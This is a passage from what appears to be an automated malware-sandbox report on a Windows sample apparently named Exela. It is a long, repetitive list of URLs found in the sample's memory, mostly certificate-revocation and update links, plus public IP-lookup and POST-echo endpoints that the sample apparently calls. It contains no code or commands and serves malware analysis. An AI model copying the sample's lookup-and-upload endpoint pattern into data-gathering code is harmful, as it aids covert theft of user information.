00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651188730.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651188730.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: svchost.exe, 0000003B.00000002.2895821645.000001B777C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784B3000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651188730.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651188730.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: Exela.exe, 00000051.00000003.1825195317.0000023B784A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784B3000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digice
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1824462822.0000023B784A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCer
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784B3000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651188730.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990622954.000002DCCF730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990622954.000002DCCF730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989119445.000002DCCF110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
            Source: svchost.exe, 0000003B.00000003.1758408950.000001B777A78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: svchost.exe, 0000003B.00000003.1758408950.000001B777A78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
            Source: svchost.exe, 0000003B.00000003.1758408950.000001B777A78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: svchost.exe, 0000003B.00000003.1758408950.000001B777A78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: svchost.exe, 0000003B.00000003.1758408950.000001B777A78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: svchost.exe, 0000003B.00000003.1758408950.000001B777A78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: svchost.exe, 0000003B.00000003.1758408950.000001B777AAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: svchost.exe, 0000003B.00000003.1758408950.000001B777B67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1974121570.000002DCCEF1D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969112805.000002DCCEF19000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1987192175.000002DCCEF1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://httpbin.org/post
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670341282.000002DCCEF78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 